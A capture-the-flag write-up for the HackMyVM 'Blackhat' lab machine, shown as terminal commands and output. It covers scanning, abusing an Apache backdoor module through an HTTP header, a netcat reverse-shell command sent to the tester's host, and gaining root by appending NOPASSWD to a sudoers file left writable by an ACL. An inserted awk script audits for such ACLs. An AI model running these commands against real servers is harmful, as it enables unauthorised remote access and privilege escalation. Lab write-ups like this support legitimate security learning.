NOTES ABOUT Blackhat

[ 2022-12-02 ] [ HackMyVM / Blackhat ]

Status: Rooted
Skills: Port Scanning, phpinfo(), RevShell, ACLs
Tools: nmap, nc, getfacl

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.45

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Hacked By HackMyVM
|_http-server-header: Apache/2.4.54 (Debian)

GETTING IN

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.45/FUZZ

index.html [Status: 200, Size: 1437, Words: 328, Lines: 63, Duration: 2ms]
.htpasswd [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 682ms]
.htaccess [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 810ms]
.hta [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 822ms]
phpinfo.php [Status: 200, Size: 69380, Words: 3300, Lines: 769, Duration: 136ms]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 1ms]

$ curl -s http://10.0.2.45
<!DOCTYPE html>
<html lang="en">

[...]
<div style="display:none;">check backboor</div>
[...]

</html>

$ curl -s http://10.0.2.45/phpinfo.php | grep backdoor
<tr><td class="e">Loaded Modules </td><td class="v"> [...] mod_backdoor [...] </td></tr>

https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor

$ curl -H 'Backdoor: id' http://10.0.2.45/
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl -H 'Backdoor: nc 10.0.2.15 443 -c sh' http://10.0.2.45/

ELEVATING PRIVILEGES

www-data@blackhat:/$ cd /home
www-data@blackhat:/home$ ls -la
drwxr-xr-x 3 darkdante darkdante 4096 Nov 13 08:45 darkdante

www-data@blackhat:/home$ su darkdante
darkdante@blackhat:/home$ id
uid=1000(darkdante) gid=1000(darkdante) groups=1000(darkdante)

darkdante@blackhat:/home$ cd
darkdante@blackhat:~$ cat user.txt
***************************

darkdante@blackhat:~$ getfacl --recursive --skip-base / 2>/dev/null | grep "file:" | cut -d" " -f3 | awk '{print "/"$1}'
[...]
/etc/sudoers

darkdante@blackhat:~$ ls -l /etc/sudoers
-r--rw----+ 1 root root 702 Dec 2 18:59 /etc/sudoers

darkdante@blackhat:~$ getfacl /etc/sudoers
getfacl: Removing leading '/' from absolute path names
# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---
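The recursive getfacl sweep above is the whole privilege-escalation story: a named ACL entry gives a non-root user write access to /etc/sudoers. The following audit helper is an added example, not part of the original writeup; it parses getfacl output from stdin and reports every named user or group entry that still grants write access after the mask is applied. It assumes the same absolute-path invocation as the writeup (so `# file: etc/sudoers` is reported as /etc/sudoers), and the sample input is constructed.

```sh
# Added audit helper (not from the original writeup). Usage on a live host:
#   getfacl --recursive --skip-base / 2>/dev/null | find_writable_acl_entries
# Prints: <path> <user:NAME|group:NAME> <entry perms> mask=<mask>
find_writable_acl_entries() {
    awk '
        BEGIN { n = 0; mask = "" }
        # print the buffered named entries of the current file, honouring the mask
        function report_file(   i) {
            for (i = 1; i <= n; i++)
                if (perm[i] ~ /w/ && (mask == "" || mask ~ /w/))
                    printf "%s\t%s\t%s\tmask=%s\n", file, who[i], perm[i], (mask == "" ? "n/a" : mask)
            n = 0; mask = ""
        }
        /^# file: / { report_file(); file = substr($0, 9); if (file !~ /^\//) file = "/" file; next }
        { sub(/[ \t]+#effective:.*$/, "") }   # strip getfacl effective-rights annotations
        /^(user|group):[^:]+:/ { split($0, f, ":"); n++; who[n] = f[1] ":" f[2]; perm[n] = f[3]; next }
        /^mask::/ { split($0, f, ":"); mask = f[3]; next }
        END { report_file() }
    '
}

# Constructed sample (the sudoers record from the writeup plus a second record on
# /etc/shadow whose mask strips the write bit) so the check runs offline.
SAMPLE_GETFACL='# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---

# file: etc/shadow
# owner: root
# group: shadow
user::rw-
user:backup:rw-
group::r--
mask::r--
other::---'

audit_sample() {
    printf '%s\n' "$SAMPLE_GETFACL" | find_writable_acl_entries
}

audit_sample
```

Only the sudoers entry is reported; the backup user's rw- on /etc/shadow is masked down to read-only and is correctly ignored.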

darkdante@blackhat:~$ echo "darkdante ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
darkdante@blackhat:~$ sudo su
root@blackhat:/home/darkdante# cd

root@blackhat:~# cat root.txt
***************************

root@blackhat:~# init 0

Session terminated, killing shell... ...killed.
Terminated